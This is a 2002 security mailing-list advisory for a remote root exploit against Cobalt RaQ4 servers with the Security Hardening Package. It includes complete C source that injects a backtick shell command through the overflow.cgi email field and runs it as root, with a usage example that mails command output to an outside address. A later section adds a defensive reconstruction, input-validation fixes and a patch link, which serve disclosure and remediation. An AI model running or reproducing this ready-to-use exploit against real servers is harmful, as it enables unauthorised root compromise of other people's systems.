[EXPL] Cobalt RaQ4 Remote Root Exploit (overflow.cgi)

From: support@securiteam.com
Date: 12/08/02

From: support@securiteam.com
To: list@securiteam.com
Date: 8 Dec 2002 22:02:03 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Cobalt RaQ4 Remote Root Exploit (overflow.cgi)
    ------------------------------------------------------------------------

    SUMMARY

    The attached exploit allows an attacker to gain remote root access on
    Cobalt RaQ 4 servers that have the Security Hardening Package (SHP)
    installed, by injecting a shell command through the package's own web
    configuration interface.

    DETAILS

    The exploit speaks plain HTTP to the Cobalt admin server (port 81 by
    default, 444 if the admin server runs with SSL) and issues three requests
    to the SHP overflow-protection ("stackguard") CGI:

    1. GET /cgi-bin/.cobalt/overflow/overflow.cgi: if the reply contains
       "overflow" the page exists, so the vulnerable package is installed.
    2. POST to the same CGI with the body
       enabled=1&email=`<command>`&page=overflow, which enables the feature
       and stores the attacker-supplied notification address, including the
       backticks, in the configuration file without sanitising it.
    3. GET /cgi-bin/.cobalt/overflow/overflowTestEmail.cgi, which sends a
       test mail to the stored address. The address is handed to a shell, the
       backticks are expanded, and <command> runs with the privileges of the
       admin server, i.e. root.

    Exploit:
    // RaQ 4 and possibly others easy remote root compromise
    // due to a flaw in the Security Hardening package HEHE!
    // Wouter ter Maat aka grazer - http://www.i-security.nl
    //
    // Three requests to the Cobalt admin httpd:
    //  1. GET  overflow.cgi          -> page exists, SHP is installed
    //  2. POST overflow.cgi          -> enable "stackguard" with the
    //                                   notification email set to `<command>`
    //  3. GET  overflowTestEmail.cgi -> a test mail is sent to that address,
    //                                   the shell expands the backticks and
    //                                   <command> runs as root

    #include <stdio.h>
    #include <stdlib.h>        /* atoi, exit */
    #include <string.h>        /* strlen, strstr, memset */
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define PORT 81 /* default cobalt admin httpd
                       try 444 if 81 runs with ssl */

    // cmpstr - substring expected in the reply to each of the three requests
    #define found "overflow"
    #define done "Starting"
    #define exec "mail"

    // prototypes
    void banner(void);
    int makereq(char *host, char *request, char *cmpstr, int port);

    int main(int argc, char *argv[]) {
        int retval, port;

        char cmd[1024];
        char cbuf[1024];
        char request2[3096];

        // evi1 requests (posted as \x.. escape sequences in the original,
        // decoded here byte for byte; note the bare \n line endings)
        char request1[] =
            "GET /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1\n"
            "Host: localhost\n\n\n";

        char req_tmp[] =
            "POST /cgi-bin/.cobalt/overflow/overflow.cgi HTTP/1.1\n"
            "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\n"
            "Accept-Language: nl\n"
            "Content-Type: application/x-www-form-urlencoded\n"
            "Accept-Encoding: gzip, deflate\n"
            "User-Agent: Mozilla/4.0 (;)\n"
            "Host: 127.0.0.1:81\n";

        char request3[] =
            "GET /cgi-bin/.cobalt/overflow/overflowTestEmail.cgi HTTP/1.1\n"
            "Host: localhost\n\n\n";

        banner();

        // argument check must come before argv[2] is used
        if (argc < 3) {
            fprintf(stderr, " %s <host> <command> <port> \n", argv[0]);
            fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\" 444\n");
            fprintf(stderr, " default port is set to 81. \n\n");
            exit(0);
        }
        if (strlen(argv[2]) > 900) {
            fprintf(stderr, " - command too long for the request buffer\n");
            exit(0);
        }

        if (argc == 3) {
            port = PORT;
        } else {
            port = atoi(argv[3]);
        }

        // POST body: the command goes into the email field inside backticks
        snprintf(cmd, sizeof(cmd), "%s%s%s", "enabled=1&email=`", argv[2],
                 "`&page=overflow\n\n");
        // Content-Length covers the body without its two trailing newlines
        snprintf(cbuf, sizeof(cbuf), "%s %d %s", "Content-Length:",
                 (int)strlen(cmd) - 2, "\n\n");
        snprintf(request2, sizeof(request2), "%s%s%s", req_tmp, cbuf, cmd);

        retval = makereq(argv[1], request1, found, port);

        if (retval == 2) {
            printf(" - name cannot be resolved!\n");
            exit(0);
        }
        if (retval == 3) {
            printf(" - connect: connection refused! d0h!\n");
            exit(0);
        }
        if (retval == 404) {
            printf(" - this machine is not vulnerable, dweep!\n");
            exit(0);
        }
        printf(" + ow yeah, we've found a victim!\n");

        printf(" ++ Enabling stackguard and creating evil config file...\n");

        retval = makereq(argv[1], request2, done, port);

        if (retval != 200) {
            printf(" -- attack failed , sorry! \n");
            exit(0);
        }
        printf(" +++ config file written successfully ! \n");

        printf(" ++++ Let's get our evil command executed...\n");

        retval = makereq(argv[1], request3, exec, port);

        if (retval != 200) {
            printf(" --- attack failed, sorry! \n");
            exit(0);
        }
        printf(" +++++ The command : \"%s\"\n +++++ has been run on the server.\n\n",
               argv[2]);

        return 0;
    }

    void banner(void) {
        printf("*************************************************\n");
        printf("RaQ 4 remote root exploit - grazer@digit-labs.org\n");
        printf("Vulnerable : RaQ4 with Security Hardening Update.\n");
        printf(" isn't it ironic? :] \n");
        printf("*************************************************\n");
    }

    // send one request and look for cmpstr in the first part of the reply.
    // returns 2 = host not found, 3 = connect failed, 200 = cmpstr seen,
    // 404 = cmpstr not seen
    int makereq(char *host, char *request, char *cmpstr, int port) {
        int fd;
        ssize_t n;
        char buf[2000];

        struct sockaddr_in addr;
        struct hostent *lh;

        if ((lh = gethostbyname(host)) == NULL) {
            return 2;
        }

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr = *((struct in_addr *) lh->h_addr);

        fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd < 0 || connect(fd, (struct sockaddr *) &addr, sizeof(addr)) != 0) {
            if (fd >= 0) close(fd);
            return 3;
        }

        send(fd, request, strlen(request), 0);

        // zero the buffer so the reply is NUL-terminated before strstr()
        // (the original read into an uninitialised buffer)
        memset(buf, 0, sizeof(buf));
        n = read(fd, buf, sizeof(buf) - 1);
        close(fd);

        if (n > 0 && strstr(buf, cmpstr) != NULL) {
            return 200;
        }
        return 404;
    }
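    The bug the exploit relies on is an email address that is stored verbatim
    and later spliced into a shell command line, so backticks in it are
    expanded when the test mail is sent. The following is an added example,
    not Cobalt's code and not part of the original advisory: it reconstructs
    that vulnerable pattern as a hypothetical build_mail_cmd_unsafe() and puts
    the two fixes a maintainer would apply next to it, a whitelist validator
    for the address and an argv-based exec that never involves /bin/sh. The
    sample payload string and the "mail -s" invocation are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Constructed sample input: an "email address" of the kind the exploit
   submits; the embedded command is an assumed placeholder. */
static const char *SAMPLE_PAYLOAD = "`id|mail you@addy`";

/* Vulnerable pattern (hypothetical reconstruction, not Cobalt's code): the
   stored address is spliced into a command line that later goes to
   system()/popen(), so /bin/sh expands the backticks.  Returns 0 on success. */
int build_mail_cmd_unsafe(const char *addr, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "echo test | mail -s 'overflow test' %s", addr);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Fix 1: accept only a conservative address alphabet, so shell
   metacharacters never reach the config file.  Returns 1 if acceptable. */
int email_is_safe(const char *addr)
{
    size_t len = strlen(addr);
    const char *at;
    if (len == 0 || len > 254)
        return 0;
    at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@'))
        return 0;
    for (const char *p = addr; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || strchr("._%+-@", c)))
            return 0;
    }
    return 1;
}

/* Fix 2: do not hand the address to a shell at all.  Build an argv for the
   mailer; the address is a single argument and stays literal whatever it
   contains.  Returns 0 on success. */
int build_mail_argv(const char *addr, char **argv, size_t maxargs)
{
    if (maxargs < 5)
        return -1;
    argv[0] = "mail";
    argv[1] = "-s";
    argv[2] = "overflow test";
    argv[3] = (char *)addr;
    argv[4] = NULL;
    return 0;
}

/* fork/exec an argv directly (no /bin/sh); returns the child's exit status
   or -1 on error */
int run_argv(char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[512];
    char *argv[5];

    build_mail_cmd_unsafe(SAMPLE_PAYLOAD, cmd, sizeof cmd);
    printf("unsafe command line a shell would expand:\n  %s\n", cmd);

    printf("email_is_safe(\"admin@example.com\") = %d\n",
           email_is_safe("admin@example.com"));
    printf("email_is_safe(payload)              = %d\n",
           email_is_safe(SAMPLE_PAYLOAD));

    /* demonstrate the argv path with echo standing in for mail: the payload
       is printed back literally, never executed */
    build_mail_argv(SAMPLE_PAYLOAD, argv, 5);
    argv[0] = "echo";
    return run_argv(argv) == 0 ? 0 : 1;
}
```

    Both fixes belong together: the whitelist stops the metacharacters from
    being persisted, and the argv exec means that even an address that slips
    past validation is just a string to the mailer. Checking a stored
    configuration value for backticks, "$(" or ";" is also a quick way to tell
    whether an exposed RaQ has already been hit.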

    Patch:
    The official patch for this problem can be found here:
    http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg

    ADDITIONAL INFORMATION

    The information has been provided by Wouter ter Maat aka grazer
    <grazer@digit-labs.org>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
